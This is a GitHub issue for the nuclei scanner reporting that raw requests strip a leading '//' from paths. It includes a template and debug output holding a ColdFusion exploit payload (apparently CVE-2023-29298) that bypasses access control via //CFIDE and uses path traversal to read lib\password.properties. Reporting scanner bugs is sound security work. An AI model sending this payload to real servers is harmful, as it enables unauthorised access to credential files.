### ISSUE TITLE
Raw Request removes // (double slash) in Request

### ISSUE THREAD

**Issue by DhiyaneshGeek** [projectdiscovery/nuclei#3924]
### Nuclei version:
 v2.9.8

### Current Behavior:
Template Used 

There is a bug  in raw request `//CFIDE/` , which is present in the template get's removed while run the template as shown below.

```yaml
id: remove-path

info:
  name: Path // Remove in Raw Request
  author: DhiyaneshDK
  severity: info

http:
  - raw:
      - |
        POST //CFIDE/wizards/common/utils.cfc?method=wizardHash^&inPassword=foo^&_cfclient=true^&returnFormat=wddx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _variables={"about":{"_metadata":{"classname":"\..\lib\password.properties"},"_variables":{}}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<wddcPacket'
          - '<struct>'
        condition: and

      - type: status
        status:
          - 200
```
```
geekfreak@localhost Desktop % nuclei -u https://example.com -t test.yaml -debug-req

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v2.9.8

		projectdiscovery.io

[INF] Current nuclei version: v2.9.8 (latest)
[INF] Current nuclei-templates version: v9.5.6 (latest)
[INF] New templates added in latest release: 3
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
[INF] [remove-path] Dumped HTTP request for https://example.com/wizards/common/utils.cfc?method=wizardHash^&inPassword=foo^&_cfclient=true^&returnFormat=wddx

POST /wizards/common/utils.cfc?method=wizardHash^&inPassword=foo^&_cfclient=true^&returnFormat=wddx HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 94
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

_variables={"about":{"_metadata":{"classname":"\..\lib\password.properties"},"_variables":{}}}
```
### Expected Behavior:

```
geekfreak@localhost Desktop % nuclei -u https://example.com -t test.yaml -debug-req

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v2.9.8

		projectdiscovery.io

[INF] Current nuclei version: v2.9.8 (latest)
[INF] Current nuclei-templates version: v9.5.6 (latest)
[INF] New templates added in latest release: 3
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
[INF] [CVE-2023-29298] Dumped HTTP request for https://example.com//CFIDE/wizards/common/utils.cfc?method=wizardHash^&inPassword=foo^&_cfclient=true^&returnFormat=wddx

POST //CFIDE/wizards/common/utils.cfc?method=wizardHash^&inPassword=foo^&_cfclient=true^&returnFormat=wddx HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Transfer-Encoding: chunked
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

_variables={"about":{"_metadata":{"classname":"\..\lib\password.properties"},"_variables":{}}}

```
